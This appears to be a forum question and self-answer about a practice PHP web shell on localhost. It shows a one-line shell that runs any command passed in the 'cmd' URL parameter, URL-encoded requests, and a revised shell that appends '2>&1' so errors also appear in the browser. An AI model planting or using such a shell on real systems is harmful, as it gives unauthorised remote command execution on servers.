I'm not sure if this is more a PHP question then a Linux question but here goes.
I am practicing with web shells, and have a very simple one that looks like this;
<?php system($_GET['cmd']); ?>
In my terminal I can view the help file for netcat, like so;
nc -h
I believe this outputs to stderr. In my terminal, I can redirect the output to a file like so;
nc &> blah
Then I can cat blah, and see the results. However, if I try the same trick through the php webshell no file is created. I.e. running these commands does nothing;
http://localhost/shell.php?cmd=nc -h &> blah
#encoded
http://localhost/shell.php?cmd=nc%20-h%20%26%3E%20blah
Why is it failing in my webshell and what tweak do I need to make in my syntax to have it work? I can issue commands (for example, ls or ls --version), and see standard output just fine.
Ultimately, I'd like to avoid writing to a file altogether, and just see ALL output of a command in my webshell, but I figured this would be an easier first step. Suggestions for the later are welcome!
I figured it out;
The issue is the ampersand is throwing off the web shell command so its what needs to be escaped. Skipping the file write, we can redirect stderr to stdout to see all output (stdout and stderr) in the browser like so;
?cmd=nc -h 2>%261
Furthermore, instead of appending 2>%261 to every command, the web shell can be modified to do the lifting for us;
<?php system($_GET['cmd'] . ' 2>&1'); ?>
Then we can just execute our commands direclty, and see both stderr and stdout output in the browser.
?cmd=nc -h
It doesn't appear to respect the original output format but that's for another question...